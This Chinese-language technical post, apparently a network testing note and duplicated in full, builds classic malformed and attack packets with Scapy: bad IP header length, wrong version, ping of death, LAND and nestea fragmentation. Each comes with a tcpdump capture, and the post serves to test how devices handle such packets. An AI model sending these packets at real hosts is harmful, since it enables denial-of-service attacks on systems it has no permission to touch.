
典型网络畸形包/攻击报文的构造和验证

2023-10-16 07:25:08

 

常见网络畸形包

畸形包:

常见的比如不符合规范的报文、字段取值错误的报文。

  • ip头的length(首部长度)小于20字节(ihl<5)

  • ip头的version不为4(version!=4)

其他攻击报文

  • ping of death

    构造大于64KB(超过IP总长度字段上限65535字节)的icmp报文。ping在各操作系统中很常见,而单个报文的长度超过了IP协议规范所规定的上限,重组时很容易导致系统处理异常,进入非正常状态,属于典型的缓冲区溢出(Buffer Overflow)攻击。

  • 圣诞树攻击

    将tcp报文的所有标志位均置为1,这会导致接收方的网络协议栈需要对这个数据包做较复杂的处理,耗费较多资源,因此也可以用于模拟DoS攻击。

  • land attack

    Local Area Network Denial (LAND) attack,局域网拒绝服务攻击:构造源地址与目标地址相同的欺骗数据包。

  • ip分片包的碎片攻击(nestea attack,teardrop attack)

使用scapy 构造对应的畸形包。

ip头的length小于20字节

# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
IGMPv3  is still under development - Nov 2010
Welcome to Scapy (2.3.2)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", ihl=2)
>>> sendp(p)
  • 抓包:

[root@16_2_7_132 ~]# tcpdump -ni eth4 -vnnvvvppp
tcpdump: WARNING: eth4: no IPv4 address assigned
tcpdump: listening on eth4, link-type EN10MB (Ethernet), capture size 65535 bytes
15:00:33.177988 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8
15:00:33.178060 IP (tos 0x0, ttl 254, id 43386, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8

ip头version不正确

注意:IP首部的version字段只有4位,scapy在组包时会按低4位截断超出范围的值,version=20在线路上实际为20 mod 16 = 4。下面的抓包也与此一致:内层报文被tcpdump按正常IPv4解析,并且172.0.0.2返回了ICMP protocol 0 unreachable,说明这次实际并未发出version!=4的报文。要真正验证该畸形包,version应取0~15范围内且不等于4的值(例如version=5),再观察抓包与接收方是否丢弃该报文。

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", version=20)
>>> sendp(p)
Sent 1 packets.
  • 抓包

15:04:53.161971 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162053 IP (tos 0x0, ttl 254, id 43391, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162069 IP (tos 0x0, ttl 64, id 7443, offset 0, flags [none], proto UDP (17), length 98)
    132.132.15.12.45575 > 90.118.4.2.4789: [bad udp cksum 0xf267 -> 0x0f5e!] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162118 IP (tos 0x0, ttl 254, id 12426, offset 0, flags [none], proto UDP (17), length 98)
    90.118.4.2.27772 > 132.132.15.11.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0

ping of death

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)
>>> d = fragment(IP(dst="172.0.0.2", src="172.0.0.1")/ICMP()/"X"*70000)
>>> cl = [p/i for i in d]
>>> sendp(cl)

ping of death 构造的包量较大,抓包不在此展示。

圣诞树攻击

 

land attack

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.2", dst="172.0.0.2")
>>> sendp(p)
.
Sent 1 packets.
  • 抓包

15:27:30.334034 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0
15:27:30.334134 IP (tos 0x0, ttl 254, id 55255, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.63063 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0

nestea attack

>>> d1 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*10)
>>> d2 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, frag=48)/("x"*116)
>>> d3 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*224)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")
>>> cl = [p/d for d in [d1, d2, d3]]
>>> sendp(cl)
...
Sent 3 packets.
  • 抓包

15:32:28.517276 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 88)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.517323 IP (tos 0x0, ttl 254, id 15635, offset 0, flags [none], proto UDP (17), length 88)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.519304 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 186)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.519331 IP (tos 0x0, ttl 254, id 43392, offset 0, flags [none], proto UDP (17), length 186)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.521297 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 302)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]
15:32:28.521330 IP (tos 0x0, ttl 254, id 15636, offset 0, flags [none], proto UDP (17), length 302)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]

典型网络畸形包/攻击报文的构造和验证

2023-10-16 07:25:08

 

常见网络畸形包

畸形包:

常见的比如不符合规范的报文、字段取值错误的报文。

  • ip头的length(首部长度)小于20字节(ihl<5)

  • ip头的version不为4(version!=4)

其他攻击报文

  • ping of death

    构造大于64KB(超过IP总长度字段上限65535字节)的icmp报文。ping在各操作系统中很常见,而单个报文的长度超过了IP协议规范所规定的上限,重组时很容易导致系统处理异常,进入非正常状态,属于典型的缓冲区溢出(Buffer Overflow)攻击。

  • 圣诞树攻击

    将tcp报文的所有标志位均置为1,这会导致接收方的网络协议栈需要对这个数据包做较复杂的处理,耗费较多资源,因此也可以用于模拟DoS攻击。

  • land attack

    Local Area Network Denial (LAND) attack,局域网拒绝服务攻击:构造源地址与目标地址相同的欺骗数据包。

  • ip分片包的碎片攻击(nestea attack,teardrop attack)

使用scapy 构造对应的畸形包。

ip头的length小于20字节

# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
IGMPv3  is still under development - Nov 2010
Welcome to Scapy (2.3.2)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", ihl=2)
>>> sendp(p)
  • 抓包:

[root@16_2_7_132 ~]# tcpdump -ni eth4 -vnnvvvppp
tcpdump: WARNING: eth4: no IPv4 address assigned
tcpdump: listening on eth4, link-type EN10MB (Ethernet), capture size 65535 bytes
15:00:33.177988 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8
15:00:33.178060 IP (tos 0x0, ttl 254, id 43386, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8

ip头version不正确

注意:IP首部的version字段只有4位,scapy在组包时会按低4位截断超出范围的值,version=20在线路上实际为20 mod 16 = 4。下面的抓包也与此一致:内层报文被tcpdump按正常IPv4解析,并且172.0.0.2返回了ICMP protocol 0 unreachable,说明这次实际并未发出version!=4的报文。要真正验证该畸形包,version应取0~15范围内且不等于4的值(例如version=5),再观察抓包与接收方是否丢弃该报文。

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", version=20)
>>> sendp(p)
Sent 1 packets.
  • 抓包

15:04:53.161971 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162053 IP (tos 0x0, ttl 254, id 43391, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162069 IP (tos 0x0, ttl 64, id 7443, offset 0, flags [none], proto UDP (17), length 98)
    132.132.15.12.45575 > 90.118.4.2.4789: [bad udp cksum 0xf267 -> 0x0f5e!] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162118 IP (tos 0x0, ttl 254, id 12426, offset 0, flags [none], proto UDP (17), length 98)
    90.118.4.2.27772 > 132.132.15.11.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0

ping of death

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)
>>> d = fragment(IP(dst="172.0.0.2", src="172.0.0.1")/ICMP()/"X"*70000)
>>> cl = [p/i for i in d]
>>> sendp(cl)

ping of death 构造的包量较大,抓包不在此展示。

圣诞树攻击

 

land attack

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.2", dst="172.0.0.2")
>>> sendp(p)
.
Sent 1 packets.
  • 抓包

15:27:30.334034 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0
15:27:30.334134 IP (tos 0x0, ttl 254, id 55255, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.63063 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0

nestea attack

>>> d1 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*10)
>>> d2 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, frag=48)/("x"*116)
>>> d3 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*224)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")
>>> cl = [p/d for d in [d1, d2, d3]]
>>> sendp(cl)
...
Sent 3 packets.
  • 抓包

15:32:28.517276 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 88)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.517323 IP (tos 0x0, ttl 254, id 15635, offset 0, flags [none], proto UDP (17), length 88)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.519304 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 186)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.519331 IP (tos 0x0, ttl 254, id 43392, offset 0, flags [none], proto UDP (17), length 186)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.521297 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 302)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]
15:32:28.521330 IP (tos 0x0, ttl 254, id 15636, offset 0, flags [none], proto UDP (17), length 302)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]